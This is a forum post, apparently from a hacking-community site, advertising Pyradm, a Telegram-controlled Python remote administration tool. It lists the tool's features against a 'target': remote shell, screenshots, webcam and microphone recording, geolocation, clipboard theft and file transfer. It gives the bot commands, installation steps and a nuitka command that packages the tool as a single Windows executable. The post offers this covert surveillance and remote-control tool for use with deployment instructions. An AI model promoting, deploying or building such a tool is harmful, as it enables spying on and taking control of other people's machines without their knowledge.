Pyradm - 透過 Telegram 的 Python 遠端管理工具

twhackteam

Administrator
站方人員

透過 telegram 進行遠端管理跨平台工具 \ 使用 ❤️ python3 + aiogram3編碼\ https://t.me/pt_soft

v0.3​

  • [X]目標截圖
  • [X] 跨平台
  • [X] 上傳/下載
  • [X] 完全相容的外殼
  • [X] 進程列表
  • [X]網路攝影機(錄影或螢幕截圖)
  • [X] 地理位置
  • [X] 檔案管理器
  • [X] 麥克風
  • [X] 剪貼簿(文字、圖像)



功能性​

代碼:
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - [URL='https://www.kitploit.com/search/label/Record%20Audio']record audio[/URL] from mic
/clip - get clipboard data
Press button to download file
Send any file as file for upload to target

安裝​

  • git clone [URL]https://github.com/akhomlyuk/pyradm.git[/URL]
  • cd pyradm
  • pip3 install -r requirements.txt
  • Put bot [URL='https://www.kitploit.com/search/label/Token']token[/URL] to cfg.py, ask @Bothfather
  • python3 main.py

編譯​

  • Put bot token to cfg.py
  • pip install nuitka
  • nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py

螢幕​




下載金字塔
 
返回
上方